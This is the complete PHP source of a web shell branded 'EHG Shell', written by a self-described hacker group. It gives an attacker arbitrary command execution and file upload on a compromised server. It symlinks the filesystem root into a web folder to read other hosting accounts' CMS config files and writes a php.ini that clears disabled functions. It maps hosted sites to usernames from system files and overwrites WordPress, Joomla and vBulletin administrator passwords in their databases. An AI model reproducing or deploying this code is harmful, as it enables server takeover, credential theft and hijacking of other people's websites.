<?php
error_reporting(0);
$il_admin = array("ehg",md5("ehgvn"));
$il_login = 1; //0 Dissable Login,1 Enable Login
//Check login Disable/Enable By Joker Dark Knight
if ($il_login == 1){
session_start();
}
else {
echo "<center><font color='red'>Warring :EHGShell Login is <b>Disable</b></font></center>";
}
if ($il_login == 1 && $_REQUEST['user'] != $il_admin[0] && $_REQUEST['pass'] != $il_admin[1]){
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<meta name="Author" content="Joker Dark Knight"/>
<title> Shell Login </title>
<style type="text/css">
body {background-color: #000;}
div.khung {
border: 1px solid #fff;
}
p,font {
color: red;
}
input {
border: 1px solid red;
background-color: #000;
color: #fff;
padding: 3px;
width: 160px;
}
input:hover,input:active {
border:dotted red;
}
</style>
</head>
<body>
<center>
<div class="khung" style="width: 30%">
<font><b>Warring</b>: Not Permission, Please login shell !</font><br />
<form method="POST" action="">
<font>Username  </font><input type="text" name="user" Placeholder=" Username... "/><br />
<font>Password  </font><input type="password" name="pass" placeholder=" Password... "/><br />
<input type="submit" value="Login" name="login" style="float: right"/>
</form>
<br />
</div>
</center>
</body>
</html>
<?php
exit;
}
if ($il_login == 1 && $_REQUEST['login'] && $_REQUEST['user'] == $il_admin[0] && md5($_REQUEST['pass']) == $il_admin[1]){
$_SESSION['jokervhbvhg'] = 1;
}
?>
<?php if ($_SESSION['JokerVHBVHG'] == 1){?>--> Login as [<b><?php print ($il_admin[0]); ?></b>] - <a href="?cmd=logout" > Logout </a> <?php } ?>
<?php
if ($_GET['cmd'] == 'logout'){
$_SESSION['jokervhbvhg'] = 0;
}
$head = '
<html>
<head>
</script>
<title>--==[[E H G SHELL by Joker Dark Knight]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border : dashed 1px;
border-color : #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT: Black 1px solid;
BORDER-TOP: #DF0000 1px solid;
BORDER-LEFT: #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border : dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}
A:link {
COLOR: White; TEXT-DECORATION: none
}
A:visited {
COLOR: White; TEXT-DECORATION: none
}
A:hover {
color: Red; TEXT-DECORATION: none
}
A:active {
color: Red; TEXT-DECORATION: none
}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>'; ?>
<html>
<head>
<?php
echo $head ;
echo '
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
<td width="100%" align=center valign="top" rowspan="1">
<font color=red size=5 face="comic sans ms"><b>--==[[ EHG SH</font><font color=white size=5 face="comic sans ms"><b>ELL By Joker Dark Knight </font><font color=green size=5 face="comic sans ms"><b> ]]==--</font> <div class="hedr">
<td height="10" align="left" class="td1"></td></tr><tr><td
width="100%" align="center" valign="top" rowspan="1"><font
color="red" face="comic sans ms"size="1"><b>
<font color=red>
####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font><br><font color=white>-==[[ For Members of the EHG]]==--</font><br> This shell was written by J D K. Or another way to say that this shell was editing by J D K. Hihihi<br>EHG is Empty Hacker Group<br>We Are Great Legion<br>We Are Power<br> We Do Not Forgive<br> We Do Not Forget <br> Expect and Join with Us...<br> We Are Expecting U...<br><font color=white>--==[[Some members from to the EHG]]==--</font>
<br># Van Cuong, Joker Dark Knight, Fwh Nguyen,Huu Duc XCryperx, Nguyen Trong Hai, Pham Thanh, Thai Chippi v.v... #<br><font color=red>
####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font>
</table>
';
?>
</head>
<body bgcolor="black"><body bgcolor="black">
<table border=1 width=100%><td width=15% align=right><font color=red size=-2 face="comic sans ms">uname<br>server_ip<br>your_ip<br>server_software<br>disabled_functions</td><td><?php echo "<font size=-2>".php_uname() ;?> <br><?php echo "<font size=-2>".gethostbyname($_SERVER["HTTP_HOST"]);?><br><?php echo $_SERVER['REMOTE_ADDR'];?><br><?php echo $s_software = getenv("SERVER_SOFTWARE"); ?><br><?php $r=ini_get('disable_functions') ? ini_get('disable_functions'):'none'; echo $r;?>
</table><?php echo $head ; ?><table width=100% ><tr><td align=center width=60% >
<?php
if(!isset($_POST['sbexe']))
{
?>
<textarea name=output cols="100" rows="10" ><?php
$r="ls -l";
echo shell_exec($r); ?></textarea>
<?php
}
else
{
if(isset($_POST['sbexe']))
{
echo "<font size=3>";
$cmde=$_POST["cmex"];
?><textarea name=output cols="100" rows="10" ><?php echo shell_exec($cmde); ?></textarea>
<?php
} }
?>
<tr><td align=center><font color=white size=3 face="comic sans ms">--==[[Command
execution]]==--</font></font><form method=POST>
<input type name=cmex >
<input type=submit name=sbexe value='HEX it now' /></form>
</td></tr>
</table><table border=1 width=100%> <tr><td align=center><?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50">    <input type="submit" name="sut" value="Upload"></form>';
if( isset($_POST['sut']) )
{
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']))
{ echo '<font color=red size=-2 face="comic sans ms">upload done<<br><br>'; }
else { echo '<font color=red size=-2 face="comic sans ms">Upload failed :P<br>'; } }
?>
<table width=100%>
<tr><td align=center><a href="<?php echo "?wjc" ; ?>"><font color=white size=2 face="comic sans ms"><b>--==[[</font><font color=red size=2 face="comic sans ms">CMS based symlink,VBulletin,wordpress and Joomla password changer</font><font color=white size=2 face="comic sans ms">]]==--</a></table>
<?php
echo $head;
if(isset($_GET['wjc']))
{
?>
<table width=100%><tr><td align=center><font color="red" size="3" face="comic sans ms">cms based
symlink</font></a></td><td width=25% align=center><font color=white size=3 face="comic sans ms">VBulletin-pass changer</font></a>
</td><td align=center><font color=white size=3 face="comic sans ms">wordpress-pass changer</font></a>
</td><td width="20%"align=center><font color=red size=3 face="comic sans ms">Joomla-pass changer</font></a> </td></tr><td align=left> <?php
//cms based symlink funcion
echo "<Form Method =Post ACTION =' '>";
echo "<font size=2 color=white face='comic sans ms'>website username <input type='text' name='uname'>   <br> ";
echo "<font color='white' size=2 face='comic sans ms'><Input type = 'Radio' Name ='config' value='wordpress'><font color='white'>wordpress";
echo "<br><Input type = 'Radio' Name ='config' value= 'joomla'><font color='white' size=2 face='comic sans ms'>joomla<br>";
echo "<Input type = 'Radio' Name ='config' value= 'vBulletin'><font color='white' size=2 face='comic sans ms'>vBulletin";
echo "<br><Input type = 'Radio' Name ='config' value= 'any'><font color='white' size=2 face='comic sans ms'>public_html";
echo "<p>";
echo "<Input type = 'Submit' Name = 'Submit1' Value = '>>'>";
echo "</FORM>";
if(isset($_POST['Submit1']))
{
$r=$_POST["config"];
if($r=="wordpress")
{
$y=trim($_POST["uname"]);
function curPageURL() {
$pageURL = 'http';
$pageURL .= "://";
if ($_SERVER["SERVER_PORT"] != "80") {
$URL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
$pageURL =$URL;
} else {
$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
}
return $pageURL;
}
$r= dirname(curPageURL());
$x=$r."/indishell/root/home/".$y."/public_html/wp-config.php";
echo "<br \><a href=". $x."><font color=white size=2 face='comic sans ms'>link to wp-config.php</a>";
}
elseif($r=="joomla")
{
$un=trim($_POST["uname"]);
function curPageURL() {
$pageURL = 'http';
$pageURL .= "://";
if ($_SERVER["SERVER_PORT"] != "80") {
$URL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
$pageURL =$URL;
} else {
$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
}
return $pageURL;
}
$r= dirname(curPageURL());
$x=$r."/indishell/root/home/".$un."/public_html/configuration.php";
echo "<br \><a href=". $x."><font color=white size=2 face='comic sans ms'>link to configuration.php</a>";
}
elseif($r=="vBulletin")
{
$y=trim($_POST["uname"]);
function curPageURL() {
$pageURL = 'http';
$pageURL .= "://";
if ($_SERVER["SERVER_PORT"] != "80") {
$URL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
$pageURL =$URL;
} else {
$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
}
return $pageURL;
}
$r= dirname(curPageURL());
$x=$r."/indishell/root/home/".$y."/public_html/includes/config.php";
echo "<br \><a href=". $x."><font color=white size=2 face='comic sans ms'>link to includes/config.php</a>";
}
elseif($r=="any")
{
$y=trim($_POST["uname"]);
function curPageURL() {
$pageURL = 'http';
$pageURL .= "://";
if ($_SERVER["SERVER_PORT"] != "80") {
$URL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
$pageURL =$URL;
} else {
$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
}
return $pageURL;
}
$r= dirname(curPageURL());
$x=$r."/indishell/root/home/".$y."/public_html/";
echo "<br \><a href=". $x."><font color=white size=2 face='comic sans ms'>link to public_html directory</a>";
}
}
?>
</td><td width=25 align=right><font size=2 color=red face=comic sans ms>
<body bgcolor=black><font color=red><form method=POST>
<font size=2 color=white face='comic sans ms'>Host:<input type=text name=lh value=localhost><br>
<font size=2 color=white face='comic sans ms'>Datbase_name:<input type=text name="dbn" ><br>
<font size=2 color=white face='comic sans ms'>Database_Username:<input type=text name="dbu"><br>
<font size=2 color=white face='comic sans ms'>Database_password:<input type=text name="dbp"><br>
<font size=2 color=white face='comic sans ms'><input type=submit name=sb value=">>" /> </form>
<?php
if(isset($_POST['sb']))
{
$r=$_POST["dbn"];
$s=$_POST["dbu"];
$t=$_POST["dbp"];
$Connect = @mysql_select_db($_POST['dbn'],mysql_pconnect($_POST['lh'],$_POST['dbu'],$_POST['dbp']));
$sqlcm=@mysql_query("UPDATE 'user' SET 'password' = 'e68f496a84ae3e9d98c130992734648b','salt' = '+-~' WHERE 'userid' = '1' LIMIT 1");
if($sqlcm){
echo "try with password 0123456";
}
}
?>
</td><td width=25% align=right><font size=2 color=red face=comic sans ms>
<form method=POST>
<br><font size=2 color=white face='comic sans ms'>Host</font><font color=red><input type= name=ht value=localhost><br>
<font size=2 color=white face='comic sans ms'>Database_name</font><input type=text name=db_name ><br>
<font size=2 color=white face='comic sans ms'>Database_user</font><input type=text name=db_us ><br>
<font size=2 color=white face='comic sans ms'>Database_password</font><input type=text name=db_ps ><br>
<font size=2 color=white face='comic sans ms'>New_username</font><input type=text name=nw_name ><br>
<font size=2 color=white face='comic sans ms'>New_pass</font><input type=text name=nw_pass ><br>
<br>
<input type=submit name=smt value=">>" /></form></td><td width=25% align=right>
<form method=POST><br>
<font size=2 color=white face='comic sans ms'>Host</font><font color=red><input type= name=ht value=localhost><br>
<font size=2 color=white face='comic sans ms'>Database_name</font><input type=text name=db_name ><br>
<font size=2 color=white face='comic sans ms'>Database_user</font><input type=text name=db_us ><br>
<font size=2 color=white face='comic sans ms'>Database_password</font><input type=text name=db_ps ><br>
<font size=2 color=white face='comic sans ms'>New_username</font><input type=text name=nw_name ><br>
<font size=2 color=white face='comic sans ms'>New_pass</font><input type=text name=nw_pass ><br>
<br>
<input type=submit name=smit value=">>" /></form></td></tr></table>
<?php }
?>
<table border=1 width=100% hight=100%><td align=center> <a href="<?php echo '?symlink'?>"><font
color=white size=3 face="comic sans ms">Symlink the_R00t
folder</a></font></td><td align=center><a href="<?php echo '?du';?>"><font
color=red size=3 face="comic sans ms">website and
username</td><td align=center><a href="<?php echo '?etv'?>"><font
color=white size=3 face="comic sans ms">username (ls
/etc/valiases)</a></td></tr></table>
<table width=100%><tr><td
align=center><a href="<?php echo '?ds';?>"><font color=white size=3 face="comic sans ms" >--==[[Generate php.ini file]]==--</a>
</td></tr>
</font></font></font>
</table>
<?php
error_reporting(0);
if(isset($_GET['symlink']))
{
$mk = mkdir('indishell',0777);
$r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$f = fopen('indishell/.htaccess','w');
$indishell = symlink("/","indishell/root");
fwrite($f , $r);
function curPageURL() {
$pageURL = 'http';
$pageURL .= "://";
if ($_SERVER["SERVER_PORT"] != "80") {
$URL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
$pageURL =$URL;
} else {
$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
}
return $pageURL;
}
$r= dirname(curPageURL());
$x=$r."/indishell/root";
echo "<p><a href=".$x."><font color=white size=4 face='comic sans ms'>check this link for symlink </a>";
}
?>
<?php
if(isset($_GET['ds']))
{
$htcs = " disable_functions =none ";
$f = fopen('php.ini','w');
fwrite($f , $htcs);
function curPageURL() {
$pageURL = 'http';
$pageURL .= "://";
if ($_SERVER["SERVER_PORT"] != "80") {
$URL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
$pageURL =$URL;
} else {
$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
}
return $pageURL;
}
$r= dirname(curPageURL());
$x=$r."/php.ini";
echo "<br \><a href=". $x."><font color=white size=4 face='comic sans ms'>link to php.ini</a>";
}
?>
<?php
?>
<?php
if(isset($_GET['du']))
{
$d0mains = @file("/etc/named.conf");
if(!$d0mains){ die("<font size=3><b><font color=white>error in reading /etc/named.conf "); }
echo "<table align=center border=1>
<tr><td><font size=3 face='comic sans ms'>website</td><td><font size=3 face=comic sans ms>username</font></td></tr>";
foreach($d0mains as $d0main){
if(eregi("zone",$d0main)){
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
echo "<tr><td><a href=http://www.".$domains[1][0]."/><font color=white face='comic sans ms'>".$domains[1][0]."</a></td><td><font color=white face='comic sans ms'>".$user['name']."</td></tr>"; flush();
}}}
}?>
<?php
echo "<font color=white>";
if(isset($_GET['etv']))
{
echo $head;
echo "<form method=post>";
echo "<br><font color=white size=4 face=comic sans ms>website name :<input type=text name=webn>";
echo "<br><br>        <input type=submit name=we value=^_^ /></form><br>";
}
?>
<?php
if(isset($_POST['we']))
{
$text=$_POST["webn"];
$text1=trim($text);
$te1 = ereg_replace("(https?)://", "", $text1);
$te = ereg_replace("www.", "", $te1);
$d="ls -la /etc/valiases/".$te;
echo shell_exec($d);
}
?>
<?php
if(isset($_GET['wp-reset']))
{
?>
<?php
}
?>
<?php
if(isset($_POST['smt']))
{
$host=$_POST["ht"];
$dbn=$_POST["db_name"];
$dbu=$_POST["db_us"];
$dbp=$_POST["db_ps"];
$nn=$_POST["nw_name"];
$np=$_POST["nw_pass"];
$npwd= md5($np);
$dbconnect=@ mysql_connect($host,$dbu,$dbp);
$dbslect=@ mysql_select_db($dbn);
$npwd= md5($np);
$ru=@ mysql_query("UPDATE `wp_users` SET `user_login` ='".$nn."' WHERE ID = 1") ;
$ru= @ mysql_query("UPDATE `wp_users` SET `user_pass` ='".$npwd."' WHERE ID = 1") ;
if(!$ru)
{
echo "<font size=2 color=white face='comic sans ms'><br>something went wrong :P";
}
else {
echo "<font size=2 color=white face='comic sans ms'><br>try to login with new password :D";
}
}
?>
<?php
if(isset($_POST['smit']))
{
$host=$_POST["ht"];
$dbn=$_POST["db_name"];
$dbu=$_POST["db_us"];
$dbp=$_POST["db_ps"];
$nn=$_POST["nw_name"];
$np=$_POST["nw_pass"];
$npwd= md5($np);
$dbconnect=@ mysql_connect($host,$dbu,$dbp);
$dbslect=@ mysql_select_db($dbn);
$npwd= md5($np);
$run =@mysql_query("UPDATE `jos_users` SET username ='".$nn."' WHERE usertype ='Super Administrator'");
$run =@mysql_query("UPDATE `jos_users` SET password ='".$npwd."' WHERE usertype = 'Super Administrator'");
$run =@mysql_query("UPDATE `jos_users` SET username ='".$nn."' WHERE usertype = 'deprecated'");
$run =@mysql_query("UPDATE `jos_users` SET password ='".$npwd."' WHERE usertype = 'deprecated'");
if(!$run)
{
echo "<font size=2 color=white face='comic sans ms'><br>something went wrong :P";
}
else {
echo "<font size=2 color=white face='comic sans ms'><br>done :D";
}
}
?>
